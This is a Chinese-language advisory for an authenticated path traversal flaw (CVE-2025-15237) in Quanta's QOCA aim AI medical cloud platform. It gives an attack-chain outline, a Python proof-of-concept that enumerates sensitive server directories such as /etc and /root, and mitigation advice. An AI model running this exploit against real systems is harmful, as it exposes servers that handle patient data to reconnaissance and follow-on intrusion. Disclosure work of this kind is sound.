CVE-2025-15237 QOCA aim AI医疗云平台路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-15237

漏洞类型

路径遍历

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

QOCA aim AI Medical Cloud Platform (Quanta Computer)

漏洞概述

CVE-2025-15237是QOCA aim AI Medical Cloud Platform中存在的一个中等严重性安全漏洞。该平台由Quanta Computer（广达电脑）开发，主要用于医疗人工智能应用。漏洞类型为绝对路径遍历（Absolute Path Traversal），允许经过身份验证的远程攻击者读取服务器上指定路径下的文件夹名称。攻击者利用此漏洞可以获取系统敏感目录结构信息，包括配置文件路径、用户目录结构、系统文件布局等关键信息。这些信息对于进一步发起更复杂的攻击具有重要价值，例如为后续的本地文件包含、远程代码执行等攻击提供目标路径信息。漏洞的CVSS评分为4.3，属于中危级别，攻击向量为网络，认证要求为低权限，无需用户交互即可实施攻击。由于该平台涉及医疗数据处理，目录信息的泄露可能间接影响患者隐私数据和医疗信息的安全性。

技术细节

QOCA aim AI Medical Cloud Platform在处理文件路径请求时存在路径遍历漏洞。攻击者通过在HTTP请求中构造特殊的路径参数，利用绝对路径遍历技术直接访问系统目录结构。漏洞主要源于应用程序对用户输入的路径参数缺乏充分的验证和过滤，允许攻击者使用绝对路径绕过安全限制直接访问文件系统。具体而言，攻击者可以通过构造类似'../../../etc'或直接指定绝对路径如'/etc/passwd'的请求参数，读取目标路径下的目录列表和文件信息。由于该平台未对路径遍历字符序列进行有效过滤，且未限制绝对路径的使用，攻击者能够枚举系统关键目录，如/etc、/var、/usr等，获取敏感路径信息。漏洞影响的是平台的文件浏览或目录遍历功能模块，攻击者利用此漏洞可获取服务器文件系统结构，为后续更高级别的攻击奠定基础。

攻击链分析

STEP 1

步骤1

攻击者获取QOCA aim AI Medical Cloud Platform的有效低权限账户凭据

STEP 2

步骤2

使用认证后的会话向平台文件遍历接口发送包含绝对路径的恶意请求

STEP 3

步骤3

在path参数中构造绝对路径遍历载荷，如直接指定系统敏感目录路径

STEP 4

步骤4

服务器未正确过滤路径遍历字符序列，直接返回指定路径下的目录列表

STEP 5

步骤5

攻击者获取系统目录结构信息，包括配置文件路径、用户目录、敏感系统文件位置

STEP 6

步骤6

利用获取的路径信息，结合其他漏洞（如文件包含、任意文件读取）实施进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-15237 PoC - QOCA aim AI Medical Cloud Platform Path Traversal
# Description: Authenticated path traversal vulnerability allowing directory enumeration

import requests
import sys
from urllib.parse import quote

TARGET_URL = "https://target-server.com"  # Replace with target URL
LOGIN_URL = f"{TARGET_URL}/api/auth/login"
PATH_TRAVERSAL_URL = f"{TARGET_URL}/api/file/list"

def login(username, password):
    """Authenticate to the platform and get session cookie"""
    session = requests.Session()
    login_data = {
        "username": username,
        "password": password
    }
    try:
        response = session.post(LOGIN_URL, json=login_data, timeout=10)
        if response.status_code == 200:
            return session
        else:
            print(f"[-] Login failed: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return None

def exploit_path_traversal(session, target_path):
    """Exploit path traversal to enumerate directory contents"""
    # Encode the target path to bypass basic filters
    encoded_path = quote(target_path)
    
    # Send request with path traversal payload
    params = {
        "path": encoded_path  # Absolute path traversal payload
    }
    
    headers = {
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "application/json"
    }
    
    try:
        response = session.get(PATH_TRAVERSAL_URL, params=params, headers=headers, timeout=10)
        if response.status_code == 200:
            return response.json()
        else:
            print(f"[-] Request failed: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return None

def main():
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-15237.py <target_url> <username> <password>")
        print("Example: python cve-2025-15237.py https://vuln-site.com admin password123")
        sys.exit(1)
    
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    
    print(f"[*] Targeting: {target}")
    print(f"[*] Authenticating as: {username}")
    
    # Step 1: Login to get authenticated session
    session = login(username, password)
    if not session:
        print("[-] Authentication failed")
        sys.exit(1)
    print("[+] Authentication successful")
    
    # Step 2: Enumerate sensitive directories
    target_paths = [
        "/etc/",
        "/var/log/",
        "/home/",
        "/root/",
        "/opt/",
        "/usr/local/etc/"
    ]
    
    for path in target_paths:
        print(f"\n[*] Enumerating: {path}")
        result = exploit_path_traversal(session, path)
        if result:
            print(f"[+] Directory contents: {result}")

if __name__ == "__main__":
    main()

影响范围

QOCA aim AI Medical Cloud Platform 未知版本

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）限制QOCA aim AI Medical Cloud Platform的网络访问，仅允许受信任的IP地址访问管理接口；2）监控和审查所有文件访问日志，及时发现异常的文件遍历请求；3）对文件遍历功能模块实施请求频率限制，防止大规模目录枚举；4）配置Web应用防火墙规则，拦截包含路径遍历特征（如../、..\、绝对路径）的请求参数；5）考虑临时禁用文件遍历功能模块，直至漏洞修复完成。